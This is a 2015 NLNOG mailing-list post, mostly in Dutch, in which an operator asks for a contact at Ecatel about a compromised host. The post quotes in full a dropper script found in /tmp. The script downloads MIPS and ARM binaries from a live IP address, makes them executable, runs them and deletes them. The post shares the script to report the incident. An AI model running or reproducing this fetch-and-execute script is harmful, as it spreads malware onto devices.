[Nlnog] Ecatel op de lijst?

Sabri Berisha sabri at cluecentral.net
Tue Sep 15 04:45:40 UTC 2015


Hi, 

Hebben we iemand van Ecatel (AS29073) op de lijst? We hebben een hakkertje op het net. Mijn huidige broodheer meldde het volgende: 



A script is installed (not sure how) in /tmp on the host, called gb.sh. Contents as follows: 



# cat gb.sh 

#!/bin/sh 



cd /tmp; wget -q http://89.248.174.106/pxmips; chmod 777 pxmips; ./pxmips; rm -f pxmips; killall -9 mips 

cd /tmp; wget -q http://89.248.174.106/pxmipsel; chmod 777 pxmipsel; ./pxmipsel; rm -f pxmipsel; killall -9 mipsel 

cd /tmp; wget -q http://89.248.174.106/pxarm; chmod 777 pxarm; ./pxarm; rm -f pxarm; killall -9 armv5l 






89.248.174.106 appears to be based in the Netherlands somewhere, and is on many internet blacklists. Any idea what that is? The host is successfully able to retrieve the px* apps, but they do not run properly. 






Thanks, 

Sabri 
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mailman.nlnog.net/pipermail/nlnog/attachments/20150914/7bdede65/attachment.html>



More information about the NLNOG mailing list